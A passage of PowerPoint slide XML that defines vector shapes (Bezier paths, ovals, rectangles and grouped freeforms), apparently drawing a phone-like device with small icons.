                    <a:pt x="2123" y="1188"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2122" y="1195"/>
                    <a:pt x="2122" y="1202"/>
                    <a:pt x="2121" y="1208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1210"/>
                    <a:pt x="2122" y="1212"/>
                    <a:pt x="2124" y="1213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1213"/>
                    <a:pt x="2128" y="1212"/>
                    <a:pt x="2129" y="1209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1203"/>
                    <a:pt x="2130" y="1196"/>
                    <a:pt x="2131" y="1189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1187"/>
                    <a:pt x="2130" y="1185"/>
                    <a:pt x="2127" y="1185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1185"/>
                    <a:pt x="2123" y="1186"/>
                    <a:pt x="2123" y="1188"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="1149"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1155"/>
                    <a:pt x="2126" y="1162"/>
                    <a:pt x="2125" y="1169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1171"/>
                    <a:pt x="2127" y="1173"/>
                    <a:pt x="2129" y="1173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1173"/>
                    <a:pt x="2133" y="1172"/>
                    <a:pt x="2133" y="1169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1163"/>
                    <a:pt x="2134" y="1156"/>
                    <a:pt x="2135" y="1149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1147"/>
                    <a:pt x="2133" y="1145"/>
                    <a:pt x="2131" y="1145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1145"/>
                    <a:pt x="2127" y="1147"/>
                    <a:pt x="2127" y="1149"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1116"/>
                    <a:pt x="2128" y="1122"/>
                    <a:pt x="2128" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1131"/>
                    <a:pt x="2130" y="1133"/>
                    <a:pt x="2132" y="1133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1133"/>
                    <a:pt x="2136" y="1131"/>
                    <a:pt x="2136" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1123"/>
                    <a:pt x="2137" y="1116"/>
                    <a:pt x="2137" y="1109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1107"/>
                    <a:pt x="2135" y="1105"/>
                    <a:pt x="2133" y="1105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1105"/>
                    <a:pt x="2129" y="1107"/>
                    <a:pt x="2129" y="1109"/>
                  </a:cubicBezTo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6" name="Oval 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4749881" y="4894619"/>
              <a:ext cx="195117" cy="19511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7" name="Oval 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4749881" y="2871628"/>
              <a:ext cx="195117" cy="195117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8" name="Oval 90"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7227298" y="4894619"/>
              <a:ext cx="195117" cy="19511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Oval 90"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7227298" y="2871628"/>
              <a:ext cx="195117" cy="19511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170" name="Group 7169"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5847832" y="3456897"/>
            <a:ext cx="621317" cy="1075494"/>
            <a:chOff x="5529714" y="3032425"/>
            <a:chExt cx="1056938" cy="2012187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5619964" y="3195764"/>
              <a:ext cx="876439" cy="15889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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5619964" y="3195764"/>
              <a:ext cx="876439" cy="1588903"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1379 w 1379"/>
                <a:gd name="T1" fmla="*/ 2500 h 2500"/>
                <a:gd name="T2" fmla="*/ 0 w 1379"/>
                <a:gd name="T3" fmla="*/ 2500 h 2500"/>
                <a:gd name="T4" fmla="*/ 1379 w 1379"/>
                <a:gd name="T5" fmla="*/ 0 h 2500"/>
                <a:gd name="T6" fmla="*/ 1379 w 1379"/>
                <a:gd name="T7" fmla="*/ 2500 h 2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79" h="2500">
                  <a:moveTo>
                    <a:pt x="1379" y="2500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="250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96" name="Group 95"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5529714" y="3032425"/>
              <a:ext cx="1056938" cy="2012187"/>
              <a:chOff x="5529714" y="3032425"/>
              <a:chExt cx="1056938" cy="2012187"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Freeform 10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5529714" y="3032425"/>
                <a:ext cx="1056938" cy="2012187"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 629 w 703"/>
                  <a:gd name="T1" fmla="*/ 0 h 1339"/>
                  <a:gd name="T2" fmla="*/ 74 w 703"/>
                  <a:gd name="T3" fmla="*/ 0 h 1339"/>
                  <a:gd name="T4" fmla="*/ 0 w 703"/>
                  <a:gd name="T5" fmla="*/ 82 h 1339"/>
                  <a:gd name="T6" fmla="*/ 0 w 703"/>
                  <a:gd name="T7" fmla="*/ 1258 h 1339"/>
                  <a:gd name="T8" fmla="*/ 74 w 703"/>
                  <a:gd name="T9" fmla="*/ 1339 h 1339"/>
                  <a:gd name="T10" fmla="*/ 629 w 703"/>
                  <a:gd name="T11" fmla="*/ 1339 h 1339"/>
                  <a:gd name="T12" fmla="*/ 703 w 703"/>
                  <a:gd name="T13" fmla="*/ 1258 h 1339"/>
                  <a:gd name="T14" fmla="*/ 703 w 703"/>
                  <a:gd name="T15" fmla="*/ 82 h 1339"/>
                  <a:gd name="T16" fmla="*/ 629 w 703"/>
                  <a:gd name="T17" fmla="*/ 0 h 1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03" h="1339">
                    <a:moveTo>
                      <a:pt x="629" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="0"/>
                      <a:pt x="74" y="0"/>
                      <a:pt x="74" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="0"/>
                      <a:pt x="0" y="37"/>
                      <a:pt x="0" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1258"/>
                      <a:pt x="0" y="1258"/>
                      <a:pt x="0" y="1258"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1303"/>
                      <a:pt x="33" y="1339"/>
                      <a:pt x="74" y="1339"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="629" y="1339"/>
                      <a:pt x="629" y="1339"/>
                      <a:pt x="629" y="1339"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="670" y="1339"/>
                      <a:pt x="703" y="1303"/>
                      <a:pt x="703" y="1258"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="703" y="82"/>
                      <a:pt x="703" y="82"/>
                      <a:pt x="703" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="703" y="37"/>
                      <a:pt x="670" y="0"/>
                      <a:pt x="629" y="0"/>
                    </a:cubicBezTo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" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6348953" y="3071194"/>
                <a:ext cx="66098" cy="68005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Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6344504" y="3066745"/>
                <a:ext cx="74996" cy="74996"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 50"/>
                  <a:gd name="T1" fmla="*/ 50 h 50"/>
                  <a:gd name="T2" fmla="*/ 0 w 50"/>
                  <a:gd name="T3" fmla="*/ 25 h 50"/>
                  <a:gd name="T4" fmla="*/ 25 w 50"/>
                  <a:gd name="T5" fmla="*/ 0 h 50"/>
                  <a:gd name="T6" fmla="*/ 50 w 50"/>
                  <a:gd name="T7" fmla="*/ 25 h 50"/>
                  <a:gd name="T8" fmla="*/ 25 w 50"/>
                  <a:gd name="T9" fmla="*/ 50 h 50"/>
                  <a:gd name="T10" fmla="*/ 25 w 50"/>
                  <a:gd name="T11" fmla="*/ 6 h 50"/>
                  <a:gd name="T12" fmla="*/ 5 w 50"/>
                  <a:gd name="T13" fmla="*/ 25 h 50"/>
                  <a:gd name="T14" fmla="*/ 25 w 50"/>
                  <a:gd name="T15" fmla="*/ 45 h 50"/>
                  <a:gd name="T16" fmla="*/ 45 w 50"/>
                  <a:gd name="T17" fmla="*/ 25 h 50"/>
                  <a:gd name="T18" fmla="*/ 25 w 50"/>
                  <a:gd name="T19" fmla="*/ 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0" h="50">
                    <a:moveTo>
                      <a:pt x="25" y="50"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="50"/>
                      <a:pt x="0" y="39"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="25" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="50" y="11"/>
                      <a:pt x="50" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="39"/>
                      <a:pt x="39" y="50"/>
                      <a:pt x="25" y="50"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="6"/>
                      <a:pt x="5" y="14"/>
                      <a:pt x="5" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="36"/>
                      <a:pt x="14" y="45"/>
                      <a:pt x="25" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="45"/>
                      <a:pt x="45" y="36"/>
                      <a:pt x="45" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="14"/>
                      <a:pt x="36" y="6"/>
                      <a:pt x="25" y="6"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="tx2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Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5914865" y="3089625"/>
                <a:ext cx="277740" cy="29871"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 185 w 185"/>
                  <a:gd name="T1" fmla="*/ 10 h 20"/>
                  <a:gd name="T2" fmla="*/ 175 w 185"/>
                  <a:gd name="T3" fmla="*/ 20 h 20"/>
                  <a:gd name="T4" fmla="*/ 10 w 185"/>
                  <a:gd name="T5" fmla="*/ 20 h 20"/>
                  <a:gd name="T6" fmla="*/ 0 w 185"/>
                  <a:gd name="T7" fmla="*/ 10 h 20"/>
                  <a:gd name="T8" fmla="*/ 10 w 185"/>
                  <a:gd name="T9" fmla="*/ 0 h 20"/>
                  <a:gd name="T10" fmla="*/ 175 w 185"/>
                  <a:gd name="T11" fmla="*/ 0 h 20"/>
                  <a:gd name="T12" fmla="*/ 185 w 185"/>
                  <a:gd name="T1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5" h="20">
                    <a:moveTo>
                      <a:pt x="185" y="10"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="16"/>
                      <a:pt x="181" y="20"/>
                      <a:pt x="175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4" y="20"/>
                      <a:pt x="0" y="16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75" y="0"/>
                      <a:pt x="175" y="0"/>
                      <a:pt x="175" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="181" y="0"/>
                      <a:pt x="185" y="5"/>
                      <a:pt x="185" y="10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14"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5910416" y="3086447"/>
                <a:ext cx="286638" cy="37498"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 178 w 191"/>
                  <a:gd name="T1" fmla="*/ 25 h 25"/>
                  <a:gd name="T2" fmla="*/ 13 w 191"/>
                  <a:gd name="T3" fmla="*/ 25 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 191"/>
                  <a:gd name="T5" fmla="*/ 12 h 25"/>
                  <a:gd name="T6" fmla="*/ 13 w 191"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 178 w 191"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 191 w 191"/>
                  <a:gd name="T11" fmla="*/ 12 h 25"/>
                  <a:gd name="T12" fmla="*/ 178 w 191"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 13 w 191"/>
                  <a:gd name="T15" fmla="*/ 5 h 25"/>
                  <a:gd name="T16" fmla="*/ 6 w 191"/>
                  <a:gd name="T17" fmla="*/ 12 h 25"/>
                  <a:gd name="T18" fmla="*/ 13 w 191"/>
                  <a:gd name="T19" fmla="*/ 19 h 25"/>
                  <a:gd name="T20" fmla="*/ 178 w 191"/>
                  <a:gd name="T21" fmla="*/ 19 h 25"/>
                  <a:gd name="T22" fmla="*/ 185 w 191"/>
                  <a:gd name="T23" fmla="*/ 12 h 25"/>
                  <a:gd name="T24" fmla="*/ 178 w 191"/>
                  <a:gd name="T25" fmla="*/ 5 h 25"/>
                  <a:gd name="T26" fmla="*/ 13 w 191"/>
                  <a:gd name="T27" fmla="*/ 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1" h="25">
                    <a:moveTo>
                      <a:pt x="178" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="25"/>
                      <a:pt x="13" y="25"/>
                      <a:pt x="13" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="25"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="6" y="0"/>
                      <a:pt x="13" y="0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85" y="0"/>
                      <a:pt x="191" y="5"/>
                      <a:pt x="191" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="19"/>
                      <a:pt x="185" y="25"/>
                      <a:pt x="178" y="25"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="5"/>
                      <a:pt x="6" y="8"/>
                      <a:pt x="6" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="16"/>
                      <a:pt x="9" y="19"/>
                      <a:pt x="13" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="19"/>
                      <a:pt x="178" y="19"/>
                      <a:pt x="178" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="182" y="19"/>
                      <a:pt x="185" y="16"/>
                      <a:pt x="185" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="8"/>
                      <a:pt x="182" y="5"/>
                      <a:pt x="178" y="5"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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" name="Oval 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6362935" y="3084541"/>
                <a:ext cx="38769" cy="39405"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx2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" name="Rectangle 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5619964" y="3195764"/>
                <a:ext cx="876439" cy="1588903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" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5619964" y="3195764"/>
                <a:ext cx="876439" cy="1588903"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1379 w 1379"/>
                  <a:gd name="T1" fmla="*/ 2500 h 2500"/>
                  <a:gd name="T2" fmla="*/ 0 w 1379"/>
                  <a:gd name="T3" fmla="*/ 2500 h 2500"/>
                  <a:gd name="T4" fmla="*/ 1379 w 1379"/>
                  <a:gd name="T5" fmla="*/ 0 h 2500"/>
                  <a:gd name="T6" fmla="*/ 1379 w 1379"/>
                  <a:gd name="T7" fmla="*/ 2500 h 2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79" h="2500">
                    <a:moveTo>
                      <a:pt x="1379" y="2500"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="2500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1379" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1379" y="2500"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="tx2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20"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5976514" y="4829792"/>
                <a:ext cx="162068" cy="162068"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 108"/>
                  <a:gd name="T1" fmla="*/ 108 h 108"/>
                  <a:gd name="T2" fmla="*/ 0 w 108"/>
                  <a:gd name="T3" fmla="*/ 54 h 108"/>
                  <a:gd name="T4" fmla="*/ 54 w 108"/>
                  <a:gd name="T5" fmla="*/ 0 h 108"/>
                  <a:gd name="T6" fmla="*/ 108 w 108"/>
                  <a:gd name="T7" fmla="*/ 54 h 108"/>
                  <a:gd name="T8" fmla="*/ 54 w 108"/>
                  <a:gd name="T9" fmla="*/ 108 h 108"/>
                  <a:gd name="T10" fmla="*/ 54 w 108"/>
                  <a:gd name="T11" fmla="*/ 5 h 108"/>
                  <a:gd name="T12" fmla="*/ 6 w 108"/>
                  <a:gd name="T13" fmla="*/ 54 h 108"/>
                  <a:gd name="T14" fmla="*/ 54 w 108"/>
                  <a:gd name="T15" fmla="*/ 103 h 108"/>
                  <a:gd name="T16" fmla="*/ 103 w 108"/>
                  <a:gd name="T17" fmla="*/ 54 h 108"/>
                  <a:gd name="T18" fmla="*/ 54 w 108"/>
                  <a:gd name="T19" fmla="*/ 5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8" h="108">
                    <a:moveTo>
                      <a:pt x="54" y="108"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="108"/>
                      <a:pt x="0" y="84"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="25" y="0"/>
                      <a:pt x="54" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="0"/>
                      <a:pt x="108" y="24"/>
                      <a:pt x="108" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="84"/>
                      <a:pt x="84" y="108"/>
                      <a:pt x="54" y="108"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="5"/>
                      <a:pt x="6" y="27"/>
                      <a:pt x="6" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="81"/>
                      <a:pt x="28" y="103"/>
                      <a:pt x="54" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="103"/>
                      <a:pt x="103" y="81"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="27"/>
                      <a:pt x="81" y="5"/>
                      <a:pt x="54" y="5"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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Rectangle 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5619964" y="4656919"/>
                <a:ext cx="291723" cy="127748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Rectangle 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5911687" y="4656919"/>
                <a:ext cx="292994" cy="127748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Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5911687" y="4656919"/>
                <a:ext cx="292994" cy="1277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Rectangle 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6204680" y="4656919"/>
                <a:ext cx="291723" cy="127748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Rectangle 25"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6204680" y="4656919"/>
                <a:ext cx="291723" cy="1277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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6307006" y="4682341"/>
                <a:ext cx="87072" cy="76903"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 41 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 51"/>
                  <a:gd name="T2" fmla="*/ 29 w 58"/>
                  <a:gd name="T3" fmla="*/ 5 h 51"/>
                  <a:gd name="T4" fmla="*/ 16 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 51"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 17 h 51"/>
                  <a:gd name="T8" fmla="*/ 1 w 58"/>
                  <a:gd name="T9" fmla="*/ 24 h 51"/>
                  <a:gd name="T10" fmla="*/ 2 w 58"/>
                  <a:gd name="T11" fmla="*/ 27 h 51"/>
                  <a:gd name="T12" fmla="*/ 29 w 58"/>
                  <a:gd name="T13" fmla="*/ 51 h 51"/>
                  <a:gd name="T14" fmla="*/ 55 w 58"/>
                  <a:gd name="T15" fmla="*/ 27 h 51"/>
                  <a:gd name="T16" fmla="*/ 57 w 58"/>
                  <a:gd name="T17" fmla="*/ 24 h 51"/>
                  <a:gd name="T18" fmla="*/ 58 w 58"/>
                  <a:gd name="T19" fmla="*/ 17 h 51"/>
                  <a:gd name="T20" fmla="*/ 41 w 58"/>
                  <a:gd name="T2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51">
                    <a:moveTo>
                      <a:pt x="41" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="0"/>
                      <a:pt x="32" y="2"/>
                      <a:pt x="29" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="2"/>
                      <a:pt x="21" y="0"/>
                      <a:pt x="16" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="21"/>
                      <a:pt x="1" y="24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9" y="42"/>
                      <a:pt x="29" y="51"/>
                      <a:pt x="29" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="51"/>
                      <a:pt x="48" y="42"/>
                      <a:pt x="55" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="27"/>
                      <a:pt x="56" y="25"/>
                      <a:pt x="57" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="21"/>
                      <a:pt x="58" y="19"/>
                      <a:pt x="58" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="7"/>
                      <a:pt x="50" y="0"/>
                      <a:pt x="41" y="0"/>
                    </a:cubicBezTo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" name="Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6019732" y="4682341"/>
                <a:ext cx="76903" cy="76903"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 26058 w 76903"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 76903"/>
                  <a:gd name="connsiteX1" fmla="*/ 51480 w 76903"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 76903"/>
                  <a:gd name="connsiteX2" fmla="*/ 51480 w 76903"/>
                  <a:gd name="connsiteY2" fmla="*/ 25423 h 76903"/>
                  <a:gd name="connsiteX3" fmla="*/ 76903 w 76903"/>
                  <a:gd name="connsiteY3" fmla="*/ 25423 h 76903"/>
                  <a:gd name="connsiteX4" fmla="*/ 76903 w 76903"/>
                  <a:gd name="connsiteY4" fmla="*/ 51481 h 76903"/>
                  <a:gd name="connsiteX5" fmla="*/ 51480 w 76903"/>
                  <a:gd name="connsiteY5" fmla="*/ 51481 h 76903"/>
                  <a:gd name="connsiteX6" fmla="*/ 51480 w 76903"/>
                  <a:gd name="connsiteY6" fmla="*/ 76903 h 76903"/>
                  <a:gd name="connsiteX7" fmla="*/ 26058 w 76903"/>
                  <a:gd name="connsiteY7" fmla="*/ 76903 h 76903"/>
                  <a:gd name="connsiteX8" fmla="*/ 26058 w 76903"/>
